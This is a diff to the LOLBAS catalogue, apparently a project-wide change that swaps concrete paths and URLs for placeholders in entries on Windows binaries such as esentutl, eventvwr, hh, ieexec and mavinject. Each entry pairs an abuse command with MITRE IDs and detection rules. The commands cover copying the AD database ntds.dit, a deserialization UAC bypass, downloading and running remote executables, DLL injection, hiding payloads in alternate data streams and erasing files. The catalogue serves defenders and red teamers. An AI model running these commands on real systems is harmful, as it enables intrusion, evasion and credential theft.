    Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
    Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
+  - Command: esentutl.exe /y {PATH_ABSOLUTE}:file.exe /d {PATH_ABSOLUTE:.exe} /o
    Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
    Usecase: Extract hidden file within alternate data streams
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
+  - Command: esentutl.exe /y {PATH_SMB:.exe} /d {PATH_ABSOLUTE}:file.exe /o
    Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
    Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
+  - Command: esentutl.exe /y {PATH_SMB:.source.exe} /d {PATH_SMB:.dest.exe} /o
    Description: Copies the source EXE to the destination EXE file
    Usecase: Use to copy files from one unc path to another
    Category: Download
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
+  - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d {PATH_ABSOLUTE:.dit}
    Description: Copies a (locked) file using Volume Shadow Copy
    Usecase: Copy/extract a locked file such as the AD Database
    Category: Copy
@ -49,8 +49,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\esentutl.exe
  - Path: C:\Windows\SysWOW64\esentutl.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml
--- a/yml/OSBinaries/Eventvwr.yml
+++ b/yml/OSBinaries/Eventvwr.yml
@ -1,7 +1,7 @@
 ---
 Name: Eventvwr.exe
 Description: Displays Windows Event Logs in a GUI window.
-Author: 'Jacob Gajek'
+Author: Jacob Gajek
 Created: 2018-11-01
 Commands:
  - Command: eventvwr.exe
@ -14,7 +14,7 @@ Commands:
    Tags:
      - Application: GUI
      - Execute: EXE
-  - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
+  - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c "{CMD}" > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
    Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
    Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
    Category: UAC Bypass
--- a/yml/OSBinaries/Expand.yml
+++ b/yml/OSBinaries/Expand.yml
@ -1,24 +1,24 @@
 ---
 Name: Expand.exe
 Description: Binary that expands one or more compressed files
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
+  - Command: expand {PATH_SMB:.bat} {PATH_ABSOLUTE:.bat}
    Description: Copies source file to destination.
    Usecase: Use to copies the source file to the destination file
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: expand c:\ADS\file1.bat c:\ADS\file2.bat
+  - Command: expand {PATH_ABSOLUTE:.source.ext} {PATH_ABSOLUTE:.dest.ext}
    Description: Copies source file to destination.
    Usecase: Copies files from A to B
    Category: Copy
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
+  - Command: expand {PATH_SMB:.bat} {PATH_ABSOLUTE}:file.bat
    Description: Copies source file to destination Alternate Data Stream (ADS)
    Usecase: Copies files from A to B
    Category: ADS
--- a/yml/OSBinaries/Explorer.yml
+++ b/yml/OSBinaries/Explorer.yml
@ -4,8 +4,8 @@ Description: Binary used for managing files and system components within Windows
 Author: Jai Minton
 Created: 2020-06-24
 Commands:
-  - Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
+  - Command: explorer.exe /root,"{PATH_ABSOLUTE:.exe}"
-    Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
+    Description: Execute specified .exe with the parent process spawning from a new instance of explorer.exe
    Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
    Category: Execute
    Privileges: User
@ -13,7 +13,7 @@ Commands:
    OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
-  - Command: explorer.exe C:\Windows\System32\notepad.exe
+  - Command: explorer.exe {PATH_ABSOLUTE:.exe}
    Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe
    Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
    Category: Execute
--- a/yml/OSBinaries/Extexport.yml
+++ b/yml/OSBinaries/Extexport.yml
@ -1,11 +1,11 @@
 ---
 Name: Extexport.exe
 Description: Load a DLL located in the c:\test folder with a specific name.
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: Extexport.exe c:\test foo bar
+  - Command: Extexport.exe {PATH_ABSOLUTE:folder} foo bar
-    Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
+    Description: Load a DLL located in the specified folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll.
    Usecase: Execute dll file
    Category: Execute
    Privileges: User
--- a/yml/OSBinaries/Extrac32.yml
+++ b/yml/OSBinaries/Extrac32.yml
@ -1,10 +1,10 @@
 ---
 Name: Extrac32.exe
 Description: Extract to ADS, copy or overwrite a file with Extrac32.exe
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
+  - Command: extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe
    Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
    Usecase: Extract data from cab file and hide it in an alternate data stream.
    Category: ADS
@ -13,7 +13,7 @@ Commands:
    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Type: Compression
-  - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
+  - Command: extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe
    Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
    Usecase: Extract data from cab file and hide it in an alternate data stream.
    Category: ADS
@ -22,15 +22,15 @@ Commands:
    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Type: Compression
-  - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
+  - Command: extrac32 /Y /C {PATH_SMB} {PATH_ABSOLUTE}
    Description: Copy the source file to the destination file and overwrite it.
    Usecase: Download file from UNC/WEBDav
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe
+  - Command: extrac32.exe /C {PATH_ABSOLUTE:.source.exe} {PATH_ABSOLUTE:.dest.exe}
-    Description: Command for copying calc.exe to another folder
+    Description: Command for copying file from one folder to another
    Usecase: Copy file
    Category: Copy
    Privileges: User
@ -39,8 +39,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\extrac32.exe
  - Path: C:\Windows\SysWOW64\extrac32.exe
 Code_Sample:
  - Code:
 Detection:
  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml
--- a/yml/OSBinaries/Findstr.yml
+++ b/yml/OSBinaries/Findstr.yml
@ -1,17 +1,17 @@
 ---
 Name: Findstr.exe
 Description: Write to ADS, discover, or download files with Findstr.exe
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: findstr /V /L W3AllLov3LolBas c:\ADS\file.exe > c:\ADS\file.txt:file.exe
+  - Command: findstr /V /L W3AllLov3LolBas {PATH_ABSOLUTE:.exe} > {PATH_ABSOLUTE}:file.exe
-    Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
+    Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) the specified .exe file is written to an Alternate Data Stream (ADS) of the specified target file.
    Usecase: Add a file to an alternate data stream to hide from defensive counter measures
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
+  - Command: findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE}:file.exe
    Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
    Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
    Category: ADS
@ -25,7 +25,7 @@ Commands:
    Privileges: User
    MitreID: T1552.001
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe
+  - Command: findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE:.exe}
    Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file.
    Usecase: Download/Copy file from webdav server
    Category: Download
@ -35,8 +35,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\findstr.exe
  - Path: C:\Windows\SysWOW64\findstr.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml
 Resources:
--- a/yml/OSBinaries/Forfiles.yml
+++ b/yml/OSBinaries/Forfiles.yml
@ -1,11 +1,11 @@
 ---
 Name: Forfiles.exe
 Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
+  - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "{CMD}"
-    Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.
+    Description: Executes specified command since there is a match for notepad.exe in the c:\windows\System32 folder.
    Usecase: Use forfiles to start a new process to evade defensive counter measures
    Category: Execute
    Privileges: User
@ -13,7 +13,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
-  - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
+  - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "{PATH_ABSOLUTE}:evil.exe"
    Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
    Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
    Category: ADS
@ -25,8 +25,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\forfiles.exe
  - Path: C:\Windows\SysWOW64\forfiles.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml
 Resources:
--- a/yml/OSBinaries/Fsutil.yml
+++ b/yml/OSBinaries/Fsutil.yml
@ -1,10 +1,10 @@
 ---
 Name: Fsutil.exe
 Description: File System Utility
-Author: 'Elliot Killick'
+Author: Elliot Killick
 Created: 2021-08-16
 Commands:
-  - Command: fsutil.exe file setZeroData offset=0 length=9999999999 C:\Windows\Temp\payload.dll
+  - Command: fsutil.exe file setZeroData offset=0 length=9999999999 {PATH_ABSOLUTE}
    Description: Zero out a file
    Usecase: Can be used to forensically erase a file
    Category: Tamper
--- a/yml/OSBinaries/Ftp.yml
+++ b/yml/OSBinaries/Ftp.yml
@ -1,10 +1,10 @@
 ---
 Name: Ftp.exe
 Description: A binary designed for connecting to FTP servers
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-12-10
 Commands:
-  - Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
+  - Command: echo !{CMD} > ftpcommands.txt && ftp -s:ftpcommands.txt
    Description: Executes the commands you put inside the text file.
    Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand
    Category: Execute
@ -23,8 +23,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\ftp.exe
  - Path: C:\Windows\SysWOW64\ftp.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml
  - IOC: cmd /c as child process of ftp.exe
--- a/yml/OSBinaries/Gpscript.yml
+++ b/yml/OSBinaries/Gpscript.yml
@ -1,7 +1,7 @@
 ---
 Name: Gpscript.exe
 Description: Used by group policy to process scripts
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
  - Command: Gpscript /logon
@ -25,8 +25,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\gpscript.exe
  - Path: C:\Windows\SysWOW64\gpscript.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml
  - IOC: Scripts added in local group policy
--- a/yml/OSBinaries/Hh.yml
+++ b/yml/OSBinaries/Hh.yml
@ -1,11 +1,11 @@
 ---
 Name: Hh.exe
 Description: Binary used for processing chm files in Windows
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: HH.exe http://some.url/script.ps1
+  - Command: HH.exe {REMOTEURL:.bat}
-    Description: Open the target PowerShell script with HTML Help.
+    Description: Open the target batch script with HTML Help.
    Usecase: Download files from url
    Category: Download
    Privileges: User
@ -14,8 +14,8 @@ Commands:
    Tags:
      - Execute: EXE
      - Application: GUI
-  - Command: HH.exe c:\windows\system32\calc.exe
+  - Command: HH.exe {PATH_ABSOLUTE:.exe}
-    Description: Executes calc.exe with HTML Help.
+    Description: Executes specified executable with HTML Help.
    Usecase: Execute process with HH.exe
    Category: Execute
    Privileges: User
@ -24,8 +24,8 @@ Commands:
    Tags:
      - Execute: EXE
      - Application: GUI
-  - Command: HH.exe http://some.url/payload.chm
+  - Command: HH.exe {REMOTEURL:.chm}
-    Description: Executes a remote payload.chm file which can contain commands.
+    Description: Executes a remote .chm file which can contain commands.
    Usecase: Execute commands with HH.exe
    Category: Execute
    Privileges: User
@ -38,8 +38,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\hh.exe
  - Path: C:\Windows\SysWOW64\hh.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml
--- a/yml/OSBinaries/IMEWDBLD.yml
+++ b/yml/OSBinaries/IMEWDBLD.yml
@ -1,10 +1,10 @@
 ---
 Name: IMEWDBLD.exe
 Description: Microsoft IME Open Extended Dictionary Module
-Author: 'Wade Hickey'
+Author: Wade Hickey
 Created: 2020-03-05
 Commands:
-  - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw
+  - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe {REMOTEURL}
    Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to INetCache.
    Usecase: Download file from Internet
    Category: Download
--- a/yml/OSBinaries/Ie4uinit.yml
+++ b/yml/OSBinaries/Ie4uinit.yml
@ -1,7 +1,7 @@
 ---
 Name: Ie4uinit.exe
 Description: Executes commands from a specially prepared ie4uinit.inf file.
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
  - Command: ie4uinit.exe -BaseSettings
@ -18,8 +18,6 @@ Full_Path:
  - Path: c:\windows\sysWOW64\ie4uinit.exe
  - Path: c:\windows\system32\ieuinit.inf
  - Path: c:\windows\sysWOW64\ieuinit.inf
 Code_Sample:
  - Code:
 Detection:
  - IOC: ie4uinit.exe copied outside of %windir%
  - IOC: ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir%
--- a/yml/OSBinaries/Iediagcmd.yml
+++ b/yml/OSBinaries/Iediagcmd.yml
@ -4,7 +4,7 @@ Description: Diagnostics Utility for Internet Explorer
 Author: manasmbellani
 Created: 2022-03-29
 Commands:
-  - Command: 'set windir=c:\test& cd "C:\Program Files\Internet Explorer\" & iediagcmd.exe /out:c:\test\foo.cab'
+  - Command: 'set windir=c:\test& cd "C:\Program Files\Internet Explorer\" & iediagcmd.exe /out:{PATH_ABSOLUTE:.cab}'
    Description: Executes binary that is pre-planted at C:\test\system32\netsh.exe.
    Usecase: Spawn a pre-planted executable from iediagcmd.exe.
    Category: Execute
--- a/yml/OSBinaries/Ieexec.yml
+++ b/yml/OSBinaries/Ieexec.yml
@ -1,11 +1,11 @@
 ---
 Name: Ieexec.exe
 Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
+  - Command: ieexec.exe {REMOTEURL:.exe}
-    Description: Downloads and executes bypass.exe from the remote server.
+    Description: Downloads and executes executable from the remote server.
    Usecase: Download and run attacker code from remote location
    Category: Download
    Privileges: User
@ -14,8 +14,8 @@ Commands:
    Tags:
      - Execute: Remote
      - Execute: EXE (.NET)
-  - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
+  - Command: ieexec.exe {REMOTEURL:.exe}
-    Description: Downloads and executes bypass.exe from the remote server.
+    Description: Downloads and executes executable from the remote server.
    Usecase: Download and run attacker code from remote location
    Category: Execute
    Privileges: User
@ -27,8 +27,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
--- a/yml/OSBinaries/Ilasm.yml
+++ b/yml/OSBinaries/Ilasm.yml
@ -4,14 +4,14 @@ Description: used for compile c# code into dll or exe.
 Author: Hai vaknin (lux)
 Created: 2020-03-17
 Commands:
-  - Command: ilasm.exe C:\public\test.txt /exe
+  - Command: ilasm.exe {PATH_ABSOLUTE:.txt} /exe
    Description: Binary file used by .NET to compile C#/intermediate (IL) code to .exe
    Usecase: Compile attacker code on system. Bypass defensive counter measures.
    Category: Compile
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows 7, Windows 10, Windows 11
-  - Command: ilasm.exe C:\public\test.txt /dll
+  - Command: ilasm.exe {PATH_ABSOLUTE:.txt} /dll
    Description: Binary file used by .NET to compile C#/intermediate (IL) code to dll
    Usecase: A description of the usecase
    Category: Compile
@ -21,8 +21,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
 Code_Sample:
  - Code:
 Detection:
  - IOC: Ilasm may not be used often in production environments (such as on endpoints)
  - Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml
@ -32,4 +30,3 @@ Acknowledgement:
  - Person: Hai Vaknin(Lux)
    Handle: '@VakninHai'
  - Person: Lior Adar
    Handle:
--- a/yml/OSBinaries/Infdefaultinstall.yml
+++ b/yml/OSBinaries/Infdefaultinstall.yml
@ -1,10 +1,10 @@
 ---
 Name: Infdefaultinstall.exe
 Description: Binary used to perform installation based on content inside inf files
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: InfDefaultInstall.exe Infdefaultinstall.inf
+  - Command: InfDefaultInstall.exe {PATH:.inf}
    Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
    Usecase: Code execution
    Category: Execute
--- a/yml/OSBinaries/Installutil.yml
+++ b/yml/OSBinaries/Installutil.yml
@ -4,7 +4,7 @@ Description: The Installer tool is a command-line utility that allows you to ins
 Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
+  - Command: InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll}
    Description: Execute the target .NET DLL or EXE.
    Usecase: Use to execute code and bypass application whitelisting
    Category: AWL Bypass
@ -14,7 +14,7 @@ Commands:
    Tags:
      - Execute: DLL (.NET)
      - Execute: EXE (.NET)
-  - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
+  - Command: InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll}
    Description: Execute the target .NET DLL or EXE.
    Usecase: Use to execute code and bypass application whitelisting
    Category: Execute
@ -24,7 +24,7 @@ Commands:
    Tags:
      - Execute: DLL (.NET)
      - Execute: EXE (.NET)
-  - Command: InstallUtil.exe https://example.com/payload
+  - Command: InstallUtil.exe {REMOTEURL}
    Description: It will download a remote payload and place it in INetCache.
    Usecase: Downloads payload from remote server
    Category: Download
--- a/yml/OSBinaries/Jsc.yml
+++ b/yml/OSBinaries/Jsc.yml
@ -1,11 +1,11 @@
 ---
 Name: Jsc.exe
 Description: Binary file used by .NET to compile JavaScript code to .exe or .dll format
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2019-05-31
 Commands:
-  - Command: jsc.exe scriptfile.js
+  - Command: jsc.exe {PATH:.js}
-    Description: Use jsc.exe to compile JavaScript code stored in scriptfile.js and output scriptfile.exe.
+    Description: Use jsc.exe to compile JavaScript code stored in the provided .JS file and generate a .EXE file with the same name.
    Usecase: Compile attacker code on system. Bypass defensive counter measures.
    Category: Compile
    Privileges: User
@ -13,8 +13,8 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: JScript
-  - Command: jsc.exe /t:library Library.js
+  - Command: jsc.exe /t:library {PATH:.js}
-    Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
+    Description: Use jsc.exe to compile JavaScript code stored in the .JS file and generate a DLL file with the same name.
    Usecase: Compile attacker code on system. Bypass defensive counter measures.
    Category: Compile
    Privileges: User
@ -27,8 +27,6 @@ Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml
  - IOC: Jsc.exe should normally not run a system unless it is used for development.
--- a/yml/OSBinaries/Ldifde.yml
+++ b/yml/OSBinaries/Ldifde.yml
@ -1,11 +1,11 @@
 ---
 Name: Ldifde.exe
 Description: Creates, modifies, and deletes LDAP directory objects.
-Author: 'Grzegorz Tworek'
+Author: Grzegorz Tworek
 Created: 2022-08-31
 Commands:
-  - Command: Ldifde -i -f inputfile.ldf
+  - Command: Ldifde -i -f {PATH:.ldf}
-    Description: Import inputfile.ldf into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder.
+    Description: Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder.
    Usecase: Download file from Internet
    Category: Download
    Privileges: Administrator
--- a/yml/OSBinaries/Makecab.yml
+++ b/yml/OSBinaries/Makecab.yml
@ -4,7 +4,7 @@ Description: Binary to package existing files into a cabinet (.cab) file
 Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
+  - Command: makecab {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:autoruns.cab
    Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
    Usecase: Hide data compressed into an alternate data stream
    Category: ADS
@ -13,7 +13,7 @@ Commands:
    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Type: Compression
-  - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
+  - Command: makecab {PATH_SMB:.exe} {PATH_ABSOLUTE}:file.cab
    Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
    Usecase: Hide data compressed into an alternate data stream
    Category: ADS
@ -22,7 +22,7 @@ Commands:
    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Type: Compression
-  - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
+  - Command: makecab {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab}
    Description: Download and compresses the target file and stores it in the target file.
    Usecase: Download file and compress into a cab file
    Category: Download
@ -31,7 +31,7 @@ Commands:
    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Type: Compression
-  - Command: makecab /F directives.ddf
+  - Command: makecab /F {PATH:.ddf}
    Description: Execute makecab commands as defined in the specified Diamond Definition File (.ddf); see resources for the format specification.
    Usecase: Bypass command-line based detections
    Category: Execute
--- a/yml/OSBinaries/Mavinject.yml
+++ b/yml/OSBinaries/Mavinject.yml
@ -1,10 +1,10 @@
 ---
 Name: Mavinject.exe
 Description: Used by App-v in Windows
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
+  - Command: MavInject.exe 3110 /INJECTRUNNING {PATH_ABSOLUTE:.dll}
    Description: Inject evil.dll into a process with PID 3110.
    Usecase: Inject dll file into running process
    Category: Execute
@ -13,7 +13,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
-  - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
+  - Command: Mavinject.exe 4172 /INJECTRUNNING {PATH_ABSOLUTE}:file.dll
    Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
    Usecase: Inject dll file into running process
    Category: ADS
--- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
+++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
@ -1,11 +1,11 @@
 ---
 Name: Microsoft.Workflow.Compiler.exe
 Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
-Author: 'Conor Richard'
+Author: Conor Richard
